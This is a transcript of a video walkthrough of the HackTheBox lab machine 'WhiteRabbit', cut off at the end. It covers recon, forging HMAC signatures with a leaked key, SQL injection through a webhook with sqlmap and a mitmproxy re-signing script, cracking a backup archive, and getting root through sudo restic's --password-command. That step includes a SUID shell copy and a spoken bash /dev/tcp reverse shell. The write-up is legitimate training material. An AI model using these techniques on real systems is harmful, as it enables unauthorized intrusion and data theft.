HackTheBox - WhiteRabbit

Key Takeaways

What's going on YouTube? This is IPSC. We doing White Rabbit from Hack the Box, which starts out with finding an uptime Kuma instance, but we don't have any credentials. However, with some light recon, we discover a public status page that leads to other domain names. There's a wiki that talks about a web hook pipeline to go fish, and that signs the body of the request with HMAC to prevent any tampering. However, the signing key is leaked, so we can bypass the signing and find an SQL injection. It's a bit of a pain to do this mainly in the repeater window because you have to keep changing the signature every request, but I try out Kaido for this part since the workflow makes it pretty simple to automatically do this. And I mistakenly thought it was free, but I think my account was on some type of trial. Anyways, after we do this, we'll use Python to quickly create a proxy that makes it easy for other tools like SQL Map to exploit this. After all that, we'll exploit a restic backup service and also a custom password generator that is using a insecure seed. So with all that being said, let's just jump in. As always, I'm going to start off with the end map. So - SC for default scripts, SV enumerate versions, -v VV for double for boost. This gives us things like the TTL 08 output all formats put in the end mapap directory and call it white rabbit and then the IP address of 10101.63. This can take some time to run, so I've already ran it. Looking at the results, we can see there are three ports open. The first one is SSH on port 22 and the banner tells us it's a Ubuntu server. We also have HTTP on port 80. Its TTL is 62, so one less than SSH. So this is probably going to be one hop away. And it's running the caddy HTTPD server and it's directing us to white rabbit.htb. So let's go ahead and add this to our host file. So we'll do a pseudo vets host. And then we can add um let's do 10 10 1163 white rabbit.htb. Save that. And let's see what else we have. There is another SSH server on port 2222. The TTL is 62. So the same TTL as the Caddy. And then we have a SSH banner. And we can see these are different. This is 3 Ubuntu 139. This is three Ubuntu 135. So this one is slightly out of date. Um, the SSH host keys are also different. So, we know this is definitely going to be a different SSH server. If I had to guess, this is probably going to be Docker because most of the time Dockers tend to be out ofd compared to the main OS just because a lot of CIS admins like doing apt update and with Docker you have to like repull it and things like that. So, um I'm just going to guess that is Docker and the um web server most likely going to be on the same containers, but doesn't really have to be. So once we get a shell on this, I'm going to like assume it's Docker and start enumerating the network. That's just what I'm thinking, right? So let's go ahead and take a look at the web server. So I'm going to go to http white rabbit.htb and we get a page that just says penetration testing services. This is a single page website. So if I click any of the links, it just brings me down to where it is. And we have some um stuff here. We have it using N8N. Maybe that's night. I forget how to pronounce that exactly. Um, go fish. And then they have uptimekuma as well. So, they're just talking about their services here. We could try seeing if there's a unique 404 page. We're just getting a completely blank response. Um, let's try a curl on this. That's probably going to be like typical of caddy. I'm guessing it just responds with 404 and no data. Uh, we could also look at like what weapilizer says and see if it identifies anything. So if we go here, look at the extension caddy bootstrap.js deliver. I'm guessing this is a static website. So my first guess is going to be trying to fuzz for virtual host. So I'm going to use fuff for this. We could use go buster, but um I've just started using fluff more for it. So we can do http white rabbit.htb and I have to fix that spelling. Uh the header is going to be host colon fuzz.whrabbit.htb. Then the word list we're going to use is opse list uh discovery DNS and I like using the subdomains top million. Let's do the 5,000. So hit enter. And then I'm going to the filter size for zero. We could probably filter status code for 302, but I like using size whenever possible. And we get a new domain which is status. So let's go ahead and add this. So pseudo v etsy host. Then we can add status.wh White rabbit dot. Man, I'm not typing that last T. HTTP. Save that. Close. And let's do HTTP status. Rabbit.htb.com. And we get uptimekuma. So if we try just logging in with like admin admin, we get nothing. We could go to the GitHub repo and see um what it's coded in. But one thing I always like doing again is looking at what things are built with. And we see this is Vue.js. So like Vue um React's another one. A lot of these big front-end web frameworks, you can get a lot of information from just analyzing the web app itself because a lot of the processing is done on the client. So I'm going to intercept this and send it to Burpswuite and we're going to see exactly what happens um when we log in. So we click login. Did that not intercept? Let's do a full page refresh and then let's see it's trying to go to dashboard. Okay, I'm going to try adminad admin login. We fail. So if I go to HTTP history, we just see dashboard and then we switch over to websockets. Um if I look at the websocket history, let's go down. We probe probe five. Here's our attempt to log in. And then we get a message back. It says, "Okay, false, incorrect username or password." So, what I want to do is change this to true. And then we can see if we can just magically log in. Now, it won't just like if we go to the server and they have everything implemented properly, we won't be able to do anything. But there's always a chance that there's some functionality that unauthorized users can do and you just get a better feel of the website itself. So, let's turn intercept on. login and then we're going to forward this login request and let's see here is the message. So let's do true here forward turn intercept off and we can see the page right if I click on let's see settings then we go to about something flashes and then it like goes away very quickly. If we try to do a lot of things, it'll probably like um just say access not allowed. But if I turn intercept on, I can click on about and we could get the exact version of uptimekuma. So if we wanted to now, we could go to like CVE details. Um let's see, probably turn burpuite off so it goes a little bit quicker. And then we play around with uptime kuma. Uh, except uptime Kuma. We got a few hits. And this is one of the things I don't like about it is you just kind of have to click around. Uh, we don't see anything in 2025. We could look at the cross site scripting in 2023, but I think this version is newer than that. Here's another product here. Looking at this, let's see. We are 123. I want to say 16. Uh, let's see. Okay, it's already timed us out. I want to say it was 16. So, nothing here. Version 2.0 does have a vulnerability. So, we can look at this. And there is a file disclosure. So, maybe we want to look at it uh more in depth, but it's telling us we need a authenticated user. So, chances are um this isn't going to work. Maybe it doesn't work because this feature is new in 2.0 and we're in 1.0. Um, additionally, uh this could just be requiring authentication. So, I'm just going to keep this in mind, but let's go ahead and play around more. And I hate that this always brings us back to the login page after a couple seconds. So, what I'm going to do is tell my Burp Suite to automatically match and replace it. So, we have a websocket rule. I'm going to go from server to client, and we want to match okay, false, and we're going to replace that with okay, true. So now whenever Burpswuite sees that, it's just going to magically intercept it. So um we should be able to play a little bit longer before it times us out. Uh let's switch back to Burp. Refresh. Do we have intercept on? No, we don't. Okay. Admin. Admin. Magic happens. And now we get here. So we could click around, see what we have. A lot of these things kind of just disappear immediately. Again, there's probably a lot of just like access denied type of things. But if I click on status pages, we get an infinite load here. This is probably um the same thing I'm talking about like we just don't have access to do something. So the page is broken. Um that is annoying. There we go. What request are you making? Get post. Uh, this is going to be a websocket thing, so we probably won't be able to see. Um, if we click on new status page, it tells us the slug is /st status, and this is going to be for monitors, right? Um, if we're logged in, chances are we'd have pages here, but since we're not logged in, it doesn't really display any. However, we can try brute forcing a status page. So, let's go ahead and try that. So, we can go back to fuff and we can do status.whraabb.htb htb and then we're going to do buzz here and again we could use go buster to do a dur bust but I already have this command so might as well just do it this way right so let's see discovery we can do web content raft small words text and the URL is actually status fuzz right because we want to fuzz any status pages so do this and there is a page called temp. So let's try accessing this. So we can just go white rabbit status temp and we get a dashboard. Awesome. So we have go fish the nadn um the main website and then wikjs. So we have a few hosts here. So I'm just going to copy this and then you guessed it. We're going to add it to our host file. So sudo v etsy host we can add that one. And what is this? We can also add this domain. Okay, save these. And let's go take a look at go fish. Um, we have to actually do HTTP. There we go. And it wants us to sign in. Um, I don't think there's a default credential for Goofish. I think once you install it, it generates a credential for you. Um, let's check out the wiki to see if there's anything here. So, I'm going to copy this and then we'll go to this page as well. And the wiki is loading. Let's see. We have wiki.js. We have a to-do add authentication the wiki because it may have sensitive data. Um, let's see if we click on browse. Does anything happen? Page contents. Oh, here we go. It finally loaded. So, we have Goofish web hooks. So looking here, we can see um can I make this picture bigger? There we go. So this is going to be kind of a big like what the web hook's doing, right? So it's going to look at a post request. It's going to check the GoFish header. If there's um no Goofish header, it's going to go down here and I think this is like fail, right? That's going to extract the signature. It's going to calculate an HMAC and then see if that HMAC is valid. If it's not valid, it's going to reject it. If it is valid, it's going to go up here to get the current fishing score. If it errors here, it's going to do some type of debug and stop. And then here, it's going to check if the user exists in the database and then get us some information. So, it's kind of hard to understand exactly what's going on, but maybe there's more documentation to clear this up, right? So, here we go. We have documentation here. Maybe I should have just read this, but um you kind of get the general point. So, here's an example HTTP request and it's going to go to this web hook and then this UU ID. Here's the signature. And then we're testing this. So, let's go ahead and copy this and let's see if it works. Um, we probably have to add this host to our host file because I'm guessing this is a new host or maybe that's the Go Fish one. Um, a668. Nope, we don't have that because this is a 28. So, we can save this. Uh, we don't need a fuff anymore. Let's see. Okay, I'm just going to make a request to this page. We will intercept it in Burp Suite. So intercept on make a request, send the request to repeater and then let's go ahead and disable that for now. Copy this. Put this big thing in repeater window. So if I send this, do we get anything? We get user is not in the database. If we change this request up, we get provided signature is not valid. And again, if we go back to the workflow, we changed um the body of the request. So the goofish signature is no longer valid and we get rejected. We don't keep on going, right? So we have to find out exactly how it is calculating this signature. So let's keep reading the wiki. and they have um this goofish fishing score to database JSON file. So I'm going to go ahead and download this and let's go ahead and move downloads go fish here. And if we cat it let's see we have a big JSON thing and the main thing I want to grab let's see this all to me is noise. I kind of want to see parameters and name I think. So let's go ahead and cat this. Let's go JQ. We can go in nodes, right? Uh do I do a dot nodes? Okay. And then I want to grab the name and parameters. There we go. This looks better to me. So let's see. So on no signature invalid signature looking here update fishing score and clicked event and right here is important to notate right this query it is going to be parameterized or prepared um I forget the exact wording but we're putting a variable here and then doing the option query replace so this is telling whatever SQL engine that is used that this is going to be a parameter and that's going to prevent any type of SQL injection Right? You normally have SQL injection whenever the um raw data is passed right in here. But if you tell it, hey, this is a variable and we're going to replace it, then SQL engines are normally smart enough. Um sometimes the case is like with um I think NodeJS and type juggling are type confusion, but uh that's a different topic. So let's see if clicked. This is just updating something I think. Update fishing score. This looks fine. If submitted data. Okay, success. Here is the debug. So I think this is just going to respond with an error message, right? So we respond text. The body is going to be the message and we'll try to um just stringify the error message. Let's see. This is going to be check goofish header. And this is just checking if we have the XGish signature. This is going to extract it. So we're going in the headers, looking at the goofish signature, and then splitting and grabbing it. And right here we have a sensitive data leak. We have the secret potentially used to calculate the signature. So let's go ahead and be um we'll call this HMAX secret, I guess. Paste that in just so we have it. and see what else we have. See current fishing score. I think this is going to be the um query we are using and it is doing a select star from victims were email and it passes this just JSON body email in directly. So this is going to be SQL injectable, right? It's not the dollar one and then doing a replace. This is just passing in raw data. So, what we want to do is see if we can get some type of um injection working here. So, I'm going to go over to Cybersh because this is going to be I think the easiest way for us to validate how the secret is being generated. So, let's just do Cybersheef and then I'm going to go over to Google. I think it's just cyerschef.io, right? This is it. This page. Come on. Loading. Awesome. So, let's grab this. We'll input this and then let's see. Do we have like a two JSON? Well, let's just try hmacking first. So, we can do HMAC pasteed in here. It's probably Shaw 256 based upon the length they showed. Um, yeah. Oh, and they say Shaw 256. So, let's go ahead and grab this HMAX secret. Copy this. Paste. And this gets BE21. And we should have a CF45. Now, we're giving it multiple lines of data, right? I bet if we like change this, yes, the output does change. So, one thing we could try is a JSON minify. And that's just going to um make this JSON remove spaces and everything like that. So now if I delete things here, it's going to be the same. And this is probably how like backend libraries are working, right? So this is D7 ends with 31 A4 and this is CF. So this is not right. I actually expected this signature to match up. Let's see. Uh, UTF8. There we go. So, we're on the wrong type of key. We had X and this is definitely not hex. So, now we have CF. If I take this minify off, you can see it definitely doesn't match. So, um, always nice to just check before we do any type of coding. So, now we have this. We could try putting a single quote in, right? So, we do a single quote. This is going to be the output. So let's put a single quote change the signature send and user not in the database. If we go back and look at this, it is using double quotes, right? Not single quotes. So let's go ahead and change this. Um I wonder we may have to do a backslash. Let's try a backslash double quote like this. If this doesn't work, then I'm going to get rid of the backslash. Escape characters are always weird. But here we go. Now we have a error message. Now, if we wanted to do this manually a bunch of times, this is a painful process. Going to Cyber Chef, going here, and editing it, right? I do not like that. Um, I want to say if we had Burp Suite Pro, we could use custom actions. I also tried playing around a bit a lot with like these uh Python scripts and maybe like creating a Python extension, but I kept running into problems and then like I was thinking if I ever got this working, I'd always just have to go Google again, right? If you're curious where this Python script's coming from, it is a extension Python scriptor. But I had a lot of trouble with this and I never ended up getting it working, but I didn't think it was a good thing just because it wouldn't benefit me in the long run. So, this is where I switched over to Kaido to see if it did something for free um that Burpuite didn't. And it does. So, this is going to be the first video we actually show Kaido, right? Um so, we're going to open up Kaido. Come on. And I was thinking about using Kaido for the whole video, but I ran into troubles doing websocket stuff with Kaido. So, um, neither tool is perfect, right? Uh, we have to create a project first. So, I'm just going to create this project. We'll mark it as temporary and call it white rabbit. And I'm also logged into Kaido. Um, that's one thing it's also particular about is creating an account and logging in. But let's get back to this. So, we go to intercept Let's go to our browser. I want to do the same thing we did in Burp. Where is Where do we want to go? Probably this URL. Let's go here. Burp http. There we go. So, we go to history. We have all the pages just like we do in BERT. But I'm going to press controlr to go into the replay tab. It's the same thing as repeater. And we have pretty much the same thing. Um, instead of like I think control space, it's in burp period. It's control enter to send the request. Um, but we have the request. One thing that's nice is it does track the history. So I can always just go back in history. I miss like I wish Burpuite did that because you can change the request and easily get back to it. Um, we can rename this. So instead of one, this is going to be fish request maybe. Yeah, that seems fine. And then I want to go and grab this. We'll paste this send and usern in database. So Kaido allows us to do a workflow and like passive active. I wish I could get this working in the uh replay window, but for some reason it just wasn't working. like I tried creating a new workflow and then in my mind if I try to create a finding on everything um I should get a finding soon as it's ran. So that's what I was trying to do. Um did I have to save that? There we go. There's passive. Let's go ahead and create one here. Create finding on active. And if this works, I'm going to be sad and we're going to have to try to play with these windows. That's enabled. That's enabled. So if I go to replay, send it. Then we go to findings, we don't have anything. So I don't think those workflows actually work on this window. And I could be wrong with that because this is literally the first time running uh Kaido. But if I click run in the workflow, we do have it creating a finding for us. But I think the workflows for that are mainly for if I want to point a program to use the proxy then it can act it as it. But it does have this convert option which I got to work with this. So if we go to this pane and we make the whole request we can add a placeholder and we can give it a workflow right and I think the intent of this is to just be able to like highlight something give it a workflow to B 64 encode it URL encode it things like that. So every time we're adding the request, we don't highlight it, press control-U to URL encode it. We can just have Tido say, "Hey, do this in the background for us." However, if we create a new workflow, we'll be able to just automatically replace this Shaw header or this Shaw um check sum with the value we want. So I'm going to go to convert, new workflow, and let's try this out. So we can add a node, and I'm going to first add one for JavaScript to get the body of the request. I wish there was a node that just had like get body get header, but I couldn't find it. It's not that hard to create. So, let's see. This is going to give us the full request. And now what we want to do is get the header and the body. So, we're going to say parsed.plit. And then we just want to do a regular expression for a double line break. And I'm doing it back slash r question mark back slashn because this will match um zero or one times. So if it's just two back slashns, it'll still match. So that's why I'm doing it that way. So we can do the same thing. And now we should have two variables, the header and the body actually um split. Let's do max of two. There we go. So now if I return the body or no string uh we should be able to save and then we want to put the input here because this is just going to let us test it. There we go. If I click run, workflow exited successfully. We look at the history. We can go here and see what it returned. So this is the data and now we just returned um the body. So this workflow is working as intended, right? So now what we want to do is go back into editor and then we want to add a new node. And I'm going to run the JSON minify. It's nice that they have this option. We can pass it to this. And I'm also going to do a rename here. And I'm going to call this grab body. The alias is just going to be body. JSON minify. That's good. We want to grab the body to start. So now this is going to JSON minify the body. Uh let's do another node. More JavaScript. We're going to send that over here. And now this one is going to be um sign. So we'll say sign HMAC. Uh, we'll call this HMAC, I guess. And let's see. So, we will need to import crypto. So, we can say import crypto from crypto. And that's going to give us the functionality to do the signing. I'm going to rename this parsed to just be message because that's going to be what we are signing. And then we want to create the key. So we'll do let key is equal to a string and we'll go and grab the hmac secret because that's going to be what the key is. Awesome. And now all we have to do is sign. So we'll do a const hmac is equal to crypto create hmac shaw 256 and the key. Then we want to give it the update and that's going to be message. So that's going to be the data we are signing. And then what we want to get out of this is um hex. So there we go. Now we can just return HMAC and let's see that is taking in JSON minify data signing it. I think that is good. So I'm going to send this here. We'll save run. uh missing reference in convert end. So we just need to put something here. We'll do the hmac run and we get the data back. Awesome. So this has successfully signed it, right? We have this here and the ending is this. Now what we need to do though is have this replace the signature. So let's add another node. We can do a uh match and replace. And there's going to be a really bad way to do it. Um, we probably should use like regular expression and like match a specific header, but this is the quick and dirty way. And sometimes that's all you need to do. So, we want to do a match and replace against the start of the data. The search term we want is this, the original HMAC string, and we're going to replace it with a reference to the HMAC data. So now we go to convert end and then that's going to be the matched replace. So we save run and here we go. We have the signature. So now if I do a single quote hopefully the signature does change. It did. So now let's go back over to the replay tab. We have highlighted the whole thing. I press control A. We go to workflow. Um, we probably should name this better, right? Uh, we'll do sign go fish hmac. Yeah, that should be fine. Replay workflow. Boom. Um, from 0 to 397. So, we match the whole thing. And now I can press control enter user notin. Now we can put a was it back slash double quote signature not valid. Uh oh. That is not good. I swear this was working. What did we send? So we match this. Let's see. Oh, I did not click add. 099 add. This was working before I did my video. I wonder if there's some type of like limit of how many times we can do this. This is going to be really frustrating. unlock the full potential. Yeah, we must be at the limit of workflows. Let's see if I go back in. Let's see where is workflow. Is because I did this stuff. Delete. Delete. sign HMAC. Okay. So, what I'm going to do is I'm going to create a new Kaido account and we'll copy the workflow over to it. Is there like a export? Uh, view editor. Import. I see import. Where is export? Fit view. Zoom. I guess there's no way download. Awesome. Save that. So, this really bothers me. No pre-processor. So, yeah, I'm going to just use a different account and maybe it'll let me. Maybe there's only so many times you can use a workflow in a day on Kaido free, which would be annoying. Okay, so I've now used a different email to log into Kaido. Let's hope this works. So if I go to workflows, magically the workflow was still here. Um I did not actually expect that. Um I expected to have to import it, but I guess it's saved in some um profile, which kind of scares me because it may know I've just switched emails. If I go over to replay, uh, we don't have any data here. So, let's go back to this, we can copy, paste, and now let's go plus. Please have this unlocked. Workflow sign add. So, that works now. Um, I'm guessing maybe it's like time based, which I really hate because I showed Kaido because it allowed this for free, but maybe it's like the first couple days you have an email. Um, but yeah, this was definitely behind some type of payw wall, I think, last time, which super annoying. Uh, let's see. Uh, we'll call this sign, I guess. So, if I send this um, let's see. Control enter send. Oh, we have to give it a URL. This There we go. Does it send now? User not in database. That is what I expected. Let's do back slash double quote. There we go. So, now it's just magically updating this. It doesn't show us in the actual pane, but it's letting us change things, which is cool. Um, so if we wanted to, we could now use um SQL injection here. And since we're getting it on an error message, it's probably going to be some type of um error based SQL injection. So let's try or extract value. This is going to be X path. Um we'll do a new line. And then I want to say select version open close that close that. And then a comment. Send it. And here we go. we have the version. So now we could just run any SQL query and we'd get the um data here. So this is how you do it manually. But let's go ahead and switch this up and um do this uh with a um proxy, right? Because I want to run um SQL map to like automate this. I don't have any easy way to update the signature. I know SQL map has like an eval thing, but that's really clunky. We could potentially write a tamper script, but again, I feel like it's clunky. If we write tamper just to like do match and replace things. Um, I like creating a like middleware proxy that we just point and map to, it updates the variable for us. And I like doing it that way because we're writing something that's not for a tool specifically. We could point anything to it, right? We could also just go back to Burpswuite or anything else and set our middleware to be the upstream proxy of Burp Suite and then we'll just edit the request for us. So this would work um in anything, right? And we're going to use uh Python's man the middle proxy for this. So let's see. I'm going to make directory proxy. I think I kind of explained that poorly. Like my mind is still like blown that I literally ran through this Kaido step this morning just to make sure I had it like how I wanted to explain it and it worked just fine. Um as soon as I started recording the video is when like it decided to payw wall me or something which sucks. Uh let's see new file. We'll say sign hmmac.py. Yeah create this file. So let's see um we will import hmac. Uh, let's give it the user bin environment Python 3. Uh, let's see. We don't want that. That's fine. I don't need update. Uh, let's do import hashlib. And of course, I think copilot has decided not to work. Let's see. Trust. Sure. I did JSON. So we can use like JSON minify things like that. Um and we can say from man the middle proxy import http. Okay let's do secret is equal to and we got to give it the secret key. So we called that what? Hmax secret. We can copy this. Paste it here. And let's see, we give it a request and this may be fine. So we're looking at method is post and the path, let's just say the path should start with where is it here? web hook. So this is going to intercept any request the proxy receives that is a post and it has um web hook in it. So here we go. We do body flow request get text signature secret. I wonder if we have to JSON something here because we're just doing body encode UTF8. I am not sure. Uh let's do X go fish signature is equal to this. Let's see. Shaw 256 is equal to like that. I think that's all we have to do. Let's put this in a try. Except exception. That should be fine. So, if this doesn't work, then we'll know we have to update this because we probably have to um encode this in JSON so it becomes like minified. I'm guessing it's not going to work right away, but who knows? Uh let's see. We have the proxy here. So, let's just do a mitm proxy. Um the script is going to be sign hmac. the port. Let's do quad 8 mode regular. Okay. So, let's see. Um, how can we easily test this? I guess let's just run a um SQL map, right? So, we can do SQL map-u. We'll give it the URL. So that's going to be this and then this. Okay. Then after URL, uh, we probably need the method to be post. Uh, the data, it's going to be JSON. We can just copy this. I don't like that. Put it on all those lines. See, I'm just going to add a space here to throw things off to make sure like it works easily. Maybe if I like had all this in um minified form, it would just magically work. But I don't want it to work magically. So I'm going to like introduce some chaos by putting a few spaces in this JSON. Okay. The parameter is going to be email. uh we have to send the headers of content type and this going to be application JSON the database was my SQL and let's do batch let's see if this works oh we didn't specify proxy um let's do-roxy is equal to http 127001 one quad 8. So that's going to go through to this and we have the request. If I look here, we should be able to see the headers. So this is the request. I don't know if it's sending the header user agent host. I don't see like um X go fish response. No signature found. So we have something wrong in our proxy. So we killed the proxy. Let's go ahead and look at this. And I think I spotted the problem. Um, it's probably not being intercepted because of this. We have request flow path is equal to this. We either want to put the full web hook in or we could probably just change this to be like starts with. So if we do this now, this should hopefully start being um intercepted. So let's go ahead and start the proxy back up. Let's go to SQL map. Run this. and we start seeing the flows. If we go in here, we can see yes, we do have the signature added, but it is not valid. And that's probably because we didn't do those um JSON steps, right? I have added a few spaces in the payload to make sure um it induces that little bit of chaos. So, let's see. Let's go back to um our code. And we have the body here. Let's do data is equal to JSON loads body and then we can say um I'll call it payload I guess and we can say this is equal to JSON dumps the data and the separators should be there and then we want to encode. There we go. And now we should just be able to do payload. Okay, so this is doing essentially what that JSON minify was hopefully. So let's go here, run this, go back to Python, look at it response, and we have an error message. That is exactly what we want to see. So now we have our um payload working, right? So we could have went to Kaido or Burpuite now and pointed at our proxy that we created and then we'd have the same functionality we did with that whole workflow. Um I probably should have just shown this knowing that it's probably behind a payw wall, but live and learn. Uh so now it's going to start um brute forcing this or not brute forcing but just trying to find the exact um type of SQL injection. What did we specify? We're not using technique so we didn't tell it to do error based injection but that should be fine. Um I'm going to stop the video or pause the video and we'll resume when this is done. Okay. So SQL map is now finished and we can see it found boolean based, blind, error based, stacked queries and timebased. So let's go ahead and run this command again. And then I'm going to specify the d-ds and that's going to just show me all the databases. So it's going to find information schema fishing and temp. So let's specify the fishing table because it's probably going to be go fish. And I'm going to do d-tables so we can see all the tables in this. And we only have victims. I was kind of expecting to see like users so we could get credentials and crack them. But let's go ahead and specify the victims table. And then we will dump it. So looking at this, we have email, fishing score, and um I guess int. But this doesn't seem to be that helpful. It's just saying like test 2345@acample.com and giving us a score. So let's see. Test five atacample.com. I wonder if I went here. Test five example.com. Send this user is not in the database. It should be in the database, right? Maybe I'm not understanding this correctly. Okay, we're not sure what's going on there, but it doesn't have any sensitive information. So, let's go ahead and look at that temp table. So let's specify um dash d temp tables and there's a command log. So let's go ahead and do the same thing. So we'll do dasht command log dump. And since only one table, we could probably just do database temp dump whatnot. But I'm just in the habit of always specifying exactly what I want because a lot of times when I use SQL map, it's doing something like boolean based queries and things that are very slow and I just want to look at specific data and I don't want it to take forever. So I'm just in the habit of always um looking closely at what it's doing. So in this command log we see youername- a then we have restic which is a backup agent not agent but like backup service a netit the repo and we have another host here so I'm going to go ahead and add this to my host file so pseudo vets host and we can add that and then we have this echo into the restic password they delete the history whatnot in here they're going in her neo opt near password generator near password generator and setting a password but this looks like it is going to be the restic password right and we can kind of test this or not by kind of test it I mean just test it I've installed restic already because we've done this before again that I think machine was artificial if you go to ipsseack.ros rocks. Hopefully I've updated it. Um, let's see. IPSC rocks. Uh, let's turn intercept off advanced accept. And then let's see what was this um rustic. There we go. We have registry and artificial. So you can look at these videos if you want to know more about restic. But here we're just going to um use the CLI that I've installed. And I just did a pseudoapp install restic is how I installed it. But let's see. We can say restic password is equal to this. And then the URL we want to put is here. So let's do restic at this. Do we have like a check? I think everything's fine. I think it actually looked um let's do a snapshots and this should show us um what backups there are installed. And we have one path devsh. So, it looks like this has been um backed up. So, let's go back here and let's say restore the ID. And the target is where we want to restore it to. I'm just going to put it in the restic directory. There we go. If we go cd restic we have dev shm bob ssh and then we have a seven-zip file. So we do sevenzip list Bob 7z. We have his public key and config. If we try to extract it, it wants a password. So let's run sevenzip to John on the zip file. And this get us the hash. And we can send this over to hashcat. So, let's go ahead and copy this sh over to the Kraken, which is another box on my network I do my cracking on. Uh, you can do it on anything. I just would recommend not doing it within a VM because it'll go extremely slow. But let's do vashes and this is white rabbit dot um what is the thing we uncall it? I guess sevenzip. Uh, put this in and then let's do dot slash hashcat the word list or the hashes and now the word list. So, opt word list rocku.ext and let's see if it automatically detects this hash. If it does, then we're good. If not, then we just specify the mode. Um, let's see. Nothing found at all. I wonder if we have to add username. And I'm thinking that because the hash had the file name colon than the hash. So, by adding the username, I think that may help it find it. It looks like it does. It is at least cracking. Now let's look at what mode it is on. Um 11600 which is 7zip. So that looks good. And it is going to crack. Let's see how long does it say. Rock you time estimate up to 31 minutes. It probably won't take that long. Um it should take probably five like under five minutes I think is most cracking on Hack the Box. So I'm just going to pause the video and let this run. And there we go. It took about one minute to run. And if I just do the d-shell, we should be able to see what the password was. It looks like it is pink lady 1. So let's go ahead and get out of my box and we can try to extract this. So 7zx bob sevenzip. Paste in the password. Was that my Looks like it was data error and encrypted file. Doesn't look like that worked. Let's see. It's definitely saying pink lady one. Copy. Paste. Let's go back into the Kraken and let's try editing a word list to remove um Pink Lady 1 and then try cracking it again because I've definitely feel like I've had this happen before where um hashcat like in the sevenzip specifically, it has some type of hash collision where it's not perfect and it gives you a bad password. So, um, shoot, let's just go v rocku.ext. I just realized I did that in a backwards order because I was talking. Um, so I'm just going to add rocku, the pink lady one back in it. And rocku 2 does not have pink lady, right? Rocku 2. Um, let's do pink lady one dollar. There we go. That should be end of line, right? So that should be it. So let's go back into root hashcat and then we can say dot slashhashcat username hashes white rabbit up word list rockyou2.ext. And we also have to remove the hashcat.pot file because this is going to be where it stores all the successful cracks. And if we didn't remove it, it wouldn't attempt to crack. it would just automatically remove it because it thinks it knows the password. So hopefully this will help us. Um let's see. There we go. It took a minute to crack last time. It's probably going to take a couple minutes now if it's going to work. So I'm going to pause the video and we will resume uh when this finishes. And around a minute yet again. That is surprising. It has cracked again. I'm going to be so upset when this says Pink Lady 1. Uh no, we get a keyboard walk. So we get a different hash. So let's go ahead and copy this. And then we're going to try sevenzip extract on this file again. And this time it successfully um extracted. So if we cat the config, we can see this is going to be port 2222. Username is Bob. We got public key and the private key. So if I cat pub.pub, pub. We can see it's actually root at lucy which is a bit odd and I guess they just renamed the file. We can also do it from the private key. A lot of times people get like a private key they don't know what it goes to and they just assume they can't find out. But this very end at the bottom of a private key is going to be the actual public key. So if we just do gp-v and I'm going to do this to get rid of the line bras or not the line brakes the dashes. So now if I do this, we just have B 64. We can do B 64-d pipe it over to strings. And we also have the public key um as well that says root at Lucy. Um doesn't really mean anything. It doesn't really help you with this box. It's just interesting to me that the keys were generated for root at Lucy and then renamed to Bob. But let's do a chod 600 on Bob so we can use this key. And then it is going to white rabbit on port 222. So let's do sh- I bob um white rabbit.htb port quad 2. Yes, accept this. Uh we need to specify Bob at this. And there we go. We get logged in. And this is going to be a docker container most likely just based upon this host name. We can do lsla on slash. There is a dockerm. If I do a pseudo-l, we can see Bob can run restic as root and I think it was the artificial machine. We showed there is a command injection vulnerability in this. I wonder if it's on gtfo bins. Let's do gtfo bins. We can see. I don't think it would be. Oh, maybe it is. Pseudo. Let's see. um right here they're not actually using the one we show um they're going to create a backup and then restore the backup over top of something. So essentially you can like create a cron job back it up restore that cron to like verbool cron root and now that cron job will run and you get a shell or you can just like overwrite the past wd shadow whatever file but restic also um supports a command called password-command uh let's see let's do pseudo restic-h password there we go so this is a shell command to obtain the repository password. So we can use this in order to get a shell, right? So we do pseudo restic. Let's do password command touchtemp IPS and then some command. I think I have to check it'll work. Do lsa on temp. We have ipsack owned by root. So what we can do is just um I'm going to copy bin bash over top of temp I impsac and then let's do a chmod 4755 on temp IPSAC and this is going to give us a uh bash that has the set uid so we can um escalate to root right so temp ipsack uh-p permission denied what root That's where that didn't copy it over. Uh, let's see. Ben bash over. Let's do shell. No follow directory. Am I like missing what CP is? I wonder if it doesn't like the and and temp. Okay, we got shell there. I don't think it likes chaining the commands. So I also do chod 4755. And if we look at this now, it is a set uid file. So we can do tempshell-p. And now we are going to be root. And you may be asking like why not just make bin bash set UID like do the chmod command on bin bash. And the main reason is um any script that is just calling or exeacting shell may just magically become root and that can break things on a system. Of course it's also a security vulnerability. Doing it in temp is also a security vulnerability but it's much cleaner to just remove it uh remove it afterwards. But whenever doing the shell, I always like just um copying bin bash and then moving it over. We could probably also do a reverse shell command. Um maybe not. Maybe it's going to fail. Uh let's see. Where was my command? Let's try this real quick. I'm going to do a bash c- i dev tcp 104 8 91 0 and one like that. close out all the quotes and let's go ahead and listen on 9001. So, we could also do a reverse shell command like that. So, there's a lot of things we could do that reverse shell command is probably going to be the most secure way to do it. Um, but this gives us a nice shell that is like fully compliant. We can do Vim, whatever we want. So, I like this. I was hoping if I did bash it would return my shell to a normal way, but it doesn't. Let's go in route and let's see. There is a public key called Morpheus. And now I'm starting to get like a matrix field to this because we have White Rabbit and now Morpheus. If we cat Morpheus.pub, we have the key name Morpheus at white rabbit.htb. And I'm going to do the same thing with this key. So, we'll do Gp-V like this. Uh, backsplash like that. Morpheus B 64-d strings. String is actually not on this box. Okay, let's go ahead and grab the key, copy it to a box. So, I'm just going to call this Morpheus. I hope I spelled that correctly. And there's no line break at the end of this uh gp--v. And there's like sh key genen. I think it's - k-y may do it. Um and it'll give you the public key. Let's see. B64-d strings. And the host name is flx at blacklist. And this is actually the box author's username. So, I'm guessing they just generated it on their machine and then copied it on over. Um, I think it's sh key genen. What did I say? Dash k-y. Does that work morpheus? No. What is that flag? Oh, it's probably um dash f instead of k. If we do f Morpheus-y uh chmod 600 Morpheus. There we go. So now we get the public key this way. And it is the box creator. And we could look at their GitHub. And this is just something I always test for. Hopefully the box creator doesn't get mad at me for showing this. But it's not really a vulnerability because that's not their actual public key. But the reason why I'm testing for this is maybe blacklist is the box like their laptop, right? And this is their username to the laptop. So it's not unreasonable to think maybe they use this public key on GitHub itself. And GitHub lets us export all the u public keys of a user. So we can go over to GitHub. So github.com and then their username which is flx0x0000. So, this is going to get us to their um GitHub, right? And we could do a keys after their username and it gives us the public keys of SSH. And we look at this. It is NISTP P26 Shaw 2. It's going to be this. This begins with bunch of A's, ends with LVZC, and it doesn't end the same. So, this is not their key they used on GitHub, which is good. Um, but I thought that was just interesting, right? So, let's go ahead and use this key. So, we can do sh- I Morpheus and then, uh, let's do white rabbit.htb. Um, let's see. We probably should spell 